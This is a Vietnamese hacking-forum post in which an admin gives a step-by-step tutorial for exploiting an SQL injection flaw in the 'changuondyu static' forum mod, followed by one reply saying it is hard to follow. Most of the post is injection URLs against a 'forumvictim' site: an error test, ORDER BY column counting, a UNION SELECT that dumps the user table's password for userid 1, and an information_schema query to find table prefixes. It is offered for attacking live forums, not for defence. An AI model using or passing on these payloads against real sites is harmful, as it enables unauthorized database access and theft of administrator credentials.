Hướng dẫn khai thác bug Changuondyu Static

[Admin]

Định không post TUT này sớm nhưng dù sao cũng có người làm hướng dẫn rồi nên post luôn cho ae.

Không hide

Chú ý là đừng mang đi phá người ta quá nhé

Ở diễn đàn có sử dụng mod changuondyu static. Ví dụ:

http://forumvictim.com/forum

Bạn truy cập vào:

http://forumvictim.com/forum/ajax.php?do=inforum&result=[COLOR=#ff0000][B]10[/B][/COLOR]&listforumid=[B][COLOR=#ff0000]123[/COLOR][/B]

2 kái chữ bôi đỏ các bạn thay cho phù hợp (Ra ngoài forum home xem victim để giá trị result như nào, listforumid thì các bạn lấy 1 id chuyên mục của victim)

Tiếp theo bạn thử thêm dấu đóng ngoặc " ) " vào sau xem, nếu nó lỗi tức là site chưa fix

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123)

Nếu đã lỗi rồi thì các bạn thực hiện order by để tìm column:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) ORDER BY 11-- -

Bạn thay số 11 đỏ ở kia = số phù hợp, sao cho đó là số lớn nhất có thể mà khi đó ko bị lỗi (Thường thì là 10)

Giả sử mình đã tìm đc giá trị đó là 10 rồi thì tiếp theo sẽ select thôi.

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(password),3,4,5,6,7,8,9,10 FROM user WHERE userid=1-- -

(Bạn có thể thử thay cái group_concat vào các số 6 hay 7 để hiển thị đc kquả tốt nhất)

Nếu xảy ra lỗi thì có thể forum này họ để VBB TABLE PREFIX, tức là table của họ ko phải dạng user nữa mà là kiểu như dct_user chẳng hạn, lúc này ta tìm tên table = cách:

http://forumvictim.com/forum/ajax.php?do=inforum&result=10&listforumid=123) UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables-- -

=> Xem tiền tố table là gì rồi bắt đầu khai thác

Nguồn: DAICA

 

[boy94]

kho hieu qua. chang biet cach dung.